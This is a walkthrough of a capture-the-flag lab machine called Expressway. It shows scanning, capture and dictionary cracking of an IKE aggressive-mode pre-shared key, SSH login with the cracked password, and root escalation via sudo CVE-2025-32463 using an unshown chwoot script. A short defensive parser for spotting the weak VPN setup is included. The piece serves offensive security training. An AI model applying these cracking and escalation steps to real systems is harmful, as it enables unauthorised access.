[Season9] Expressway WP

Information Gathering

A TCP scan shows that only port 22 is open:

```
root@cloudcone ~/workspace# rustscan -a $IP
Automatically increasing ulimit value to 1000.
Open 10.10.11.87:22
```

Scanning UDP as well shows that port 500 (ISAKMP) is open:

```
root@cloudcone ~/workspace# nmap -sU -Pn $IP
Nmap scan report for 10.10.11.87
Host is up (2.7s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp
4500/udp open|filtered nat-t-ike
```

500/udp - Pentesting IPsec/IKE VPN - HackTricks

ike-scan shows that the authentication method is PSK; querying in Aggressive Mode additionally returns an identity, the user `ike`:

```
root@cloudcone ~/workspace# ike-scan -M 10.10.11.87
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Main Mode Handshake returned
HDR=(CKY-R=446bae038926673a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

Ending ike-scan 1.9.5: 1 hosts scanned in 1.845 seconds (0.54 hosts/sec). 1 returned handshake; 0 returned notify

root@cloudcone ~/workspace# ike-scan -A -M 10.10.11.87
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=4bbacd2a5016f7f6)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.680 seconds (1.47 hosts/sec). 1 returned handshake; 0 returned notify
```

Cracking the PSK hash

```
root@cloudcone ~/workspace# ike-scan -Phash.txt -A -M 10.10.11.87
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=373fa754bb77e682)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.153 seconds (6.53 hosts/sec). 1 returned handshake; 0 returned notify
root@cloudcone ~/workspace# psk-crack -d rockyou.txt hash.txt
Starting psk-crack [ike-scan 1.9.5] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash acf5072f0876729115ae3b2d42b1a27b2e84ef63
Ending psk-crack: 8045039 iterations in 16.306 seconds (493393.28 iterations/sec)
```
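As an added defensive check (not part of the original writeup), the following Python parses ike-scan output in the format shown above and flags the conditions that made the PSK recoverable: an Aggressive Mode response with Auth=PSK (the hash is handed to any unauthenticated peer and can be cracked offline), the identity sent in the clear, and the weak 3DES/SHA1/modp1024 transform. The sample text is constructed from the output above, and the table of weak attribute values is this check's own assumption.

```python
import re

# Constructed sample: the Aggressive Mode handshake as ike-scan prints it.
SAMPLE = """10.10.11.87 Aggressive Mode Handshake returned
HDR=(CKY-R=4bbacd2a5016f7f6)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
Hash(20 bytes)
"""

# Assumed policy: SA attribute values an auditor would treat as weak.
WEAK = {
    "Enc": {"DES", "3DES"},
    "Hash": {"MD5", "SHA1"},
    "Group": {"1:modp768", "2:modp1024"},
}

def parse_ike_scan(text):
    """Return the handshake mode, SA attributes, disclosed ID and whether a Hash payload came back."""
    result = {"mode": None, "sa": {}, "id": None, "hash_returned": False}
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"\S+ (Main|Aggressive) Mode Handshake returned", line)
        if m:
            result["mode"] = m.group(1)
        m = re.match(r"SA=\((.*)\)$", line)
        if m:
            # "Enc=3DES Hash=SHA1 ..." -> {"Enc": "3DES", "Hash": "SHA1", ...}
            result["sa"] = dict(kv.split("=", 1) for kv in m.group(1).split())
        m = re.match(r"ID\(Type=(\w+), Value=([^)]+)\)", line)
        if m:
            result["id"] = m.group(2)
        if line.startswith("Hash("):
            result["hash_returned"] = True
    return result

def findings(parsed):
    """List the conditions that expose the PSK to offline cracking or weaken the SA."""
    out = []
    sa = parsed["sa"]
    if parsed["mode"] == "Aggressive" and sa.get("Auth") == "PSK" and parsed["hash_returned"]:
        out.append("aggressive-mode PSK: hash disclosed to unauthenticated peers (offline crackable)")
    if parsed["id"]:
        out.append(f"identity disclosed in clear: {parsed['id']}")
    for attr, weak_values in WEAK.items():
        if sa.get(attr) in weak_values:
            out.append(f"weak {attr}: {sa[attr]}")
    return out
```

Running `findings(parse_ike_scan(SAMPLE))` on the sample reports all five conditions; a Main Mode-only responder with a modern transform would return an empty list.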

Logging in over SSH as ike:freakingrockstarontheroad gives the user flag:

```
root@cloudcone ~/workspace [SIGINT]# ssh ike@$IP
ike@10.10.11.87's password:
Last login: Wed Sep 17 10:26:26 BST 2025 from 10.10.14.77 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Sep 22 08:49:37 2025 from 10.10.16.17
ike@expressway:~$ cat user.txt
24db6a7ba04d31d042da08cfcebb1517
```

The installed sudo version is affected by CVE-2025-32463 (pr0v3rbs/CVE-2025-32463_chwoot: Escalation of Privilege to the root through sudo binary with chroot option):

```
ike@expressway:~$ sudo -V
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17

ike@expressway:~$ sudo -R woot woot
sudo: woot: No such file or directory
```

Using it to escalate privileges:

```
ike@expressway:~$ chmod +x sudo-chwoot.sh 
ike@expressway:~$ ./sudo-chwoot.sh
woot!
root@expressway:/# cat /root/root.txt
b52dbb542ec88b60a5713de6eb159d2d
```